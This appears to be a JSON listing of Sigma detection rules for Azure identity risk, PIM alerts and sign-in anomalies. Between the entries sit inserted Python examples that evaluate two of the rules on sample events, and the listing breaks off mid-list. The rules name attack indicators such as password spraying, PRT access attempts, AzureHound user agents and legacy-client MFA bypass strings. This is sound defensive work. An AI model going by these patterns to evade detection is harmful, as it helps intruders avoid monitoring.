    "content": "title: New Country\nid: adf9f4d2-559e-4f5c-95be-c28dff0b1476\nstatus: test\ndescription: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'newCountry'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml",
    "content": "title: Password Spray Activity\nid: 28ecba0a-c743-4690-ad29-9a8f6f25a6f9\nstatus: test\ndescription: Indicates that a password spray attack has been successfully performed.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1110\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'passwordSpray'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_prt_access.yml",
    "content": "title: Primary Refresh Token Access Attempt\nid: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1\nstatus: test\ndescription: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1528\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'attemptedPrtAccess'\n    condition: selection\nfalsepositives:\n    - This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml",
    "content": "title: Suspicious Browser Activity\nid: 944f6adb-7a99-4c69-80c1-b712579e93e6\nstatus: test\ndescription: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'suspiciousBrowser'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml",
    "content": "title: Azure AD Threat Intelligence\nid: a2cb56ff-4f46-437a-a0fa-ffa4d1303cba\nstatus: test\ndescription: Indicates user activity that is unusual for the user or consistent with known attack patterns.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-07\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'investigationsThreatIntelligence'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml",
    "content": "title: SAML Token Issuer Anomaly\nid: e3393cba-31f0-4207-831e-aef90ab17a8c\nstatus: test\ndescription: Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1606\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'tokenIssuerAnomaly'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml",
    "content": "title: Unfamiliar Sign-In Properties\nid: 128faeef-79dd-44ca-b43c-a9e236a60f49\nstatus: test\ndescription: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'unfamiliarFeatures'\n    condition: selection\nfalsepositives:\n    - User changing to a new device, location, browser, etc.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml",
    "content": "title: Stale Accounts In A Privileged Role\nid: e402c26a-267a-45bd-9615-bd9ceda6da85\nstatus: test\ndescription: Identifies when an account holding a privileged role hasn't signed in during the past n days.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'staleSignInAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate whether this is a generic account that cannot be removed.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml",
    "content": "title: Invalid PIM License\nid: 58af08eb-f9e1-43c8-9805-3ad9b0482bd8\nstatus: test\ndescription: Identifies when an organization doesn't have the proper license for PIM and is out of compliance.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'invalidLicenseAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if licenses have expired.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml",
    "content": "title: Roles Assigned Outside PIM\nid: b1bc08d1-8224-4758-a0e6-fbcfc98c73bb\nstatus: test\ndescription: Identifies when a privileged role assignment has taken place outside of PIM and may indicate an attack.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'rolesAssignedOutsidePrivilegedIdentityManagementAlertConfiguration'\n    condition: selection\nfalsepositives:\n    - Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml",
    "content": "title: Roles Activated Too Frequently\nid: 645fd80d-6c07-435b-9e06-7bc1b5656cba\nstatus: test\ndescription: Identifies when the same privileged role has multiple activations by the same user.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'sequentialActivationRenewalsAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate whether the active time period for the role is set too short.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml",
    "content": "title: Roles Activation Doesn't Require MFA\nid: 94a66f46-5b64-46ce-80b2-75dcbe627cc0\nstatus: test\ndescription: Identifies when a privileged role can be activated without performing MFA.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'noMfaOnRoleActivationAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if user is performing MFA at sign-in.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml",
    "content": "title: Roles Are Not Being Used\nid: 8c6ec464-4ae4-43ac-936a-291da66ed13d\nstatus: test\ndescription: Identifies when a user has been assigned a privileged role and is not using that role.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'redundantAssignmentAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if potential generic account that cannot be removed.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml",
    "content": "title: Too Many Global Admins\nid: 7bbc309f-e2b1-4eb1-8369-131a367d67d3\nstatus: test\ndescription: Identifies an event where there are too many accounts assigned the Global Administrator role.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'tooManyGlobalAdminsAssignedToTenantAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if threshold setting in PIM is too low.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_account_lockout.yml",
    "content": "title: Account Lockout\nid: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a\nstatus: test\ndescription: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50053\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml",
    "content": "title: Increased Failed Authentications Of Any Type\nid: e1d02b53-c03c-4948-b11d-4d00cca49d03\nstatus: test\ndescription: Detects when failed sign-ins of any type increased by 10% or greater.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'\ndate: 2022-08-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: failure\n        Count: \"<10%\"\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml",
    "content": "title: Measurable Increase Of Successful Authentications\nid: 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae\nstatus: test\ndescription: Detects when successful sign-ins increased by 10% or greater.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton\ndate: 2022-08-11\nmodified: 2022-08-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: Success\n        Count: \"<10%\"\n    condition: selection\nfalsepositives:\n    - Increase of users in the environment\nlevel: low\n"
  },
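The two rules above describe a relative-increase check ("10% or greater" against a baseline) that Sigma's field syntax cannot express, which is why they carry a `Count: "<10%"` placeholder. The following is an added example, not code from the Sigma repository or any of its backends: it computes that check directly by counting sign-ins of a given `Status` in the current hour and the preceding hour and flagging the status when the increase meets the threshold. The events are constructed sample records, not real sign-in logs, and the one-hour comparison window is an assumption.

```python
"""Added example (not part of the Sigma repository): evaluates the
"increased by 10% or greater" condition described by the Azure sign-in
increase rules against constructed sample events."""
from datetime import datetime, timedelta

ONE_HOUR = timedelta(hours=1)
BASELINE_START = datetime(2024, 5, 1, 9)   # assumed baseline window start
CURRENT_START = datetime(2024, 5, 1, 10)   # assumed current window start

# Constructed sample events: (timestamp, Status). Status strings follow the
# casing the two rules use ("failure" and "Success"). Not real log data.
SAMPLE_EVENTS = (
    [(BASELINE_START + timedelta(minutes=m), "failure") for m in range(0, 60, 6)]   # 10 failures
    + [(BASELINE_START + timedelta(minutes=m), "Success") for m in range(0, 60, 3)]  # 20 successes
    + [(CURRENT_START + timedelta(minutes=m), "failure") for m in range(0, 60, 5)]   # 12 failures (+20%)
    + [(CURRENT_START + timedelta(minutes=m), "Success") for m in range(0, 60, 3)]   # 20 successes (+0%)
)


def count_by_window(events, status, window_start, window=ONE_HOUR):
    """Count events with the given Status in [window_start, window_start + window)."""
    end = window_start + window
    return sum(1 for ts, st in events if st == status and window_start <= ts < end)


def percent_increase(current, baseline):
    """Relative change from baseline to current, in percent. A zero baseline
    with current activity is treated as an unbounded increase so it still alerts."""
    if baseline == 0:
        return float("inf") if current > 0 else 0.0
    return (current - baseline) / baseline * 100.0


def auth_increase_alert(events, status, current_start=CURRENT_START,
                        window=ONE_HOUR, threshold_pct=10.0):
    """Compare the current window against the immediately preceding window of
    the same length. Returns (fires, percent_change)."""
    baseline = count_by_window(events, status, current_start - window, window)
    current = count_by_window(events, status, current_start, window)
    pct = percent_increase(current, baseline)
    return pct >= threshold_pct, pct


if __name__ == "__main__":
    for status in ("failure", "Success"):
        fires, pct = auth_increase_alert(SAMPLE_EVENTS, status)
        print(f"{status}: {pct:+.1f}% change, alert={fires}")
```

In a SIEM this would be a scheduled aggregation over the sign-in table rather than an in-memory list; the point of the example is the baseline comparison and the zero-baseline edge case, which a raw percentage would otherwise divide by zero on.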
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml",
    "content": "title: Authentications To Important Apps Using Single Factor Authentication\nid: f272fb46-25f2-422c-b667-45837994980f\nstatus: test\ndescription: Detect when authentications to important application(s) only required single-factor authentication\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        AppId: 'Insert Application ID use OR for multiple'\n        AuthenticationRequirement: 'singleFactorAuthentication'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml",
    "content": "title: Successful Authentications From Countries You Do Not Operate Out Of\nid: 8c944ecb-6970-4541-8496-be554b8e2846\nstatus: test\ndescription: Detect successful authentications from countries you do not operate out of.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n    filter:\n        Location|contains: '<Countries you DO operate out of, e.g. GB; use OR for multiple>'\n    condition: selection and not filter\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml",
    "content": "title: Discovery Using AzureHound\nid: 35b781cc-1a08-4a5a-80af-42fd7c315c6b\nstatus: test\ndescription: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.\nreferences:\n    - https://github.com/BloodHoundAD/AzureHound\nauthor: Janantha Marasinghe\ndate: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1087.004\n    - attack.t1526\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        userAgent|contains: 'azurehound'\n        ResultType: 0\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml",
    "content": "title: Device Registration or Join Without MFA\nid: 5afa454e-030c-4ab4-9253-a90aa7fcc581\nstatus: test\ndescription: Monitor and alert for device registration or join events where MFA was not performed.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResourceDisplayName: 'Device Registration Service'\n        conditionalAccessStatus: 'success'\n    filter_mfa:\n        AuthenticationRequirement: 'multiFactorAuthentication'\n    condition: selection and not filter_mfa\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml",
    "content": "title: Failed Authentications From Countries You Do Not Operate Out Of\nid: 28870ae4-6a13-4616-bd1a-235a7fad7458\nstatus: test\ndescription: Detect failed authentications from countries you do not operate out of.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n    selection1:\n        Location|contains: '<Countries you DO operate out of, e.g. GB; use OR for multiple>'\n    condition: not selection and not selection1\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml",
    "content": "title: Azure AD Only Single Factor Authentication Required\nid: 28eea407-28d7-4e42-b0be-575d5ba60b2c\nstatus: test\ndescription: Detect when users are authenticating without MFA being required.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1556.006\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        AuthenticationRequirement: 'singleFactorAuthentication'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml",
    "content": "title: Suspicious SignIns From A Non Registered Device\nid: 572b12d4-9062-11ed-a1eb-0242ac120002\nstatus: test\ndescription: Detects risky authentication from a non AD registered device without MFA being required.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\nauthor: Harjot Singh, '@cyb3rjy0t'\ndate: 2023-01-10\nmodified: 2025-07-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection_main:\n        Status: 'Success'\n        AuthenticationRequirement: 'singleFactorAuthentication'\n        RiskState: 'atRisk'\n    selection_empty1:\n        DeviceDetail.trusttype: ''\n    selection_empty2:\n        DeviceDetail.trusttype: null\n    condition: selection_main and 1 of selection_empty*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml",
    "content": "title: Sign-ins from Non-Compliant Devices\nid: 4f77e1d7-3982-4ee0-8489-abf2d6b75284\nstatus: test\ndescription: Monitor and alert for sign-ins where the device was non-compliant.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        DeviceDetail.isCompliant: 'false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml",
    "content": "title: Sign-ins by Unknown Devices\nid: 4d136857-6a1a-432a-82fc-5dd497ee5e7c\nstatus: test\ndescription: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\nmodified: 2022-10-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        AuthenticationRequirement: singleFactorAuthentication\n        ResultType: 0\n        NetworkLocationDetails: '[]'\n        DeviceDetail.deviceId: ''\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml",
    "content": "title: Potential MFA Bypass Using Legacy Client Authentication\nid: 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc\nstatus: test\ndescription: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.\nreferences:\n    - https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022\n    - https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/\nauthor: Harjot Singh, '@cyb3rjy0t'\ndate: 2023-03-20\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        userAgent|contains:\n            - 'BAV2ROPC'\n            - 'CBAinPROD'\n            - 'CBAinTAR'\n    condition: selection\nfalsepositives:\n    - Known Legacy Accounts\nlevel: high\n"
  },
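Two of the sign-in rules above rely on Sigma semantics that are easy to get wrong when porting to a SIEM query: "Suspicious SignIns From A Non Registered Device" needs `1 of selection_empty*` to treat an empty `DeviceDetail.trusttype` and an absent or null one as two distinct cases, and "Potential MFA Bypass Using Legacy Client Authentication" relies on `userAgent|contains` over a list (OR semantics, case-insensitive). The block below is an added example, not code from the Sigma project or pySigma: a small matcher that implements only the field logic those two rules use (exact match, `|contains`, value lists, `null`, `1 of prefix*`) and runs both rules over constructed sample sign-in events. The condition is expressed as a Python callable rather than parsed from the rule's condition string; the event records and their field values are constructed for the example.

```python
"""Added example (not part of the Sigma repository or its tooling): a minimal
matcher for the field logic used by the two Azure sign-in rules discussed
above, run over constructed sample events."""

MISSING = object()  # sentinel for "field not present in the event"


def get_field(event, dotted):
    """Resolve 'DeviceDetail.trusttype'-style keys against a nested dict."""
    cur = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return MISSING
        cur = cur[part]
    return cur


def field_matches(event, key, expected):
    """Evaluate one Sigma field line. `key` may carry a `|contains` modifier;
    `expected` may be a scalar, a list (OR semantics) or None (Sigma `null`).
    String comparison is case-insensitive, as in Sigma."""
    name, _, modifier = key.partition("|")
    value = get_field(event, name)
    for exp in (expected if isinstance(expected, list) else [expected]):
        if exp is None:  # Sigma `null`: field absent or JSON null
            if value is MISSING or value is None:
                return True
            continue
        if value is MISSING or value is None:
            continue
        v, e = str(value).lower(), str(exp).lower()
        if modifier == "contains":
            if e in v:
                return True
        elif v == e:  # '' matches only a present, empty string
            return True
    return False


def selection_matches(event, selection):
    """All field lines inside one selection are ANDed."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def one_of(results, prefix):
    """Sigma `1 of prefix*`: any selection whose name starts with prefix matched."""
    return any(v for k, v in results.items() if k.startswith(prefix))


def evaluate(rule, event):
    """rule = {'selections': {name: {field: value}}, 'condition': callable(results)}."""
    results = {name: selection_matches(event, sel) for name, sel in rule["selections"].items()}
    return rule["condition"](results)


# Field logic copied from the two rules above; the condition is a Python callable.
RISKY_UNREGISTERED = {
    "selections": {
        "selection_main": {"Status": "Success",
                           "AuthenticationRequirement": "singleFactorAuthentication",
                           "RiskState": "atRisk"},
        "selection_empty1": {"DeviceDetail.trusttype": ""},
        "selection_empty2": {"DeviceDetail.trusttype": None},
    },
    "condition": lambda r: r["selection_main"] and one_of(r, "selection_empty"),
}
LEGACY_CLIENT_MFA_BYPASS = {
    "selections": {"selection": {"Status": "Success",
                                 "userAgent|contains": ["BAV2ROPC", "CBAinPROD", "CBAinTAR"]}},
    "condition": lambda r: r["selection"],
}

# Constructed sample sign-in events (not real log data).
EVENTS = [
    {"id": 1, "Status": "Success", "AuthenticationRequirement": "singleFactorAuthentication",
     "RiskState": "atRisk", "DeviceDetail": {"trusttype": ""}, "userAgent": "Mozilla/5.0"},
    {"id": 2, "Status": "Success", "AuthenticationRequirement": "singleFactorAuthentication",
     "RiskState": "atRisk", "DeviceDetail": {"deviceId": "abc"}, "userAgent": "Mozilla/5.0"},
    {"id": 3, "Status": "Success", "AuthenticationRequirement": "singleFactorAuthentication",
     "RiskState": "atRisk", "DeviceDetail": {"trusttype": "Azure AD joined"}, "userAgent": "Mozilla/5.0"},
    {"id": 4, "Status": "Success", "AuthenticationRequirement": "multiFactorAuthentication",
     "RiskState": "none", "DeviceDetail": {"trusttype": "Azure AD joined"}, "userAgent": "BAV2ROPC"},
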